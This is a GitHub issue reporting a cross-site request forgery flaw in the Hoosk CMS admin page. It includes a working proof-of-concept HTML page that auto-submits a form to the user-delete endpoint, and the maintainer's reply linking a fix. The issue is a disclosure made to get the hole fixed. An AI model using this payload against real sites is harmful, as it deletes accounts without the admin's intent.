Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CSRF issue that allows attacker to delete an account #53

Closed
3072L opened this issue Apr 12, 2020 · 2 comments · Fixed by #56
Closed

CSRF issue that allows attacker to delete an account #53

3072L opened this issue Apr 12, 2020 · 2 comments · Fixed by #56

Comments

@3072L
Copy link

3072L commented Apr 12, 2020

Hi,bro.I also find an csrf issue in admin page.

When attacker induce authenticated admin user to a malicious web page, any accounts can be deleted without admin user's intention.

how to reproduce the issue.

  1. Login to admin page.(/admin)
  2. Keep login and access the html it has following content
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://demo.hoosk.org/admin/users/delete/userid" method="POST">
      <input type="hidden" name="deleteid" value="userid" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

userid is very easy to guess.

3.And account userid = userid is delete without admin user's intention.

how to fix this issue.
set csrf token to protect delete function.

@havok89 havok89 linked a pull request May 1, 2020 that will close this issue
@havok89
Copy link
Owner

havok89 commented May 1, 2020

Thanks for the issues you raised. I'm finally getting time to work on this now lol

@3072L
Copy link
Author

3072L commented May 8, 2020

you're welcome bro!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

Successfully merging a pull request may close this issue.

2 participants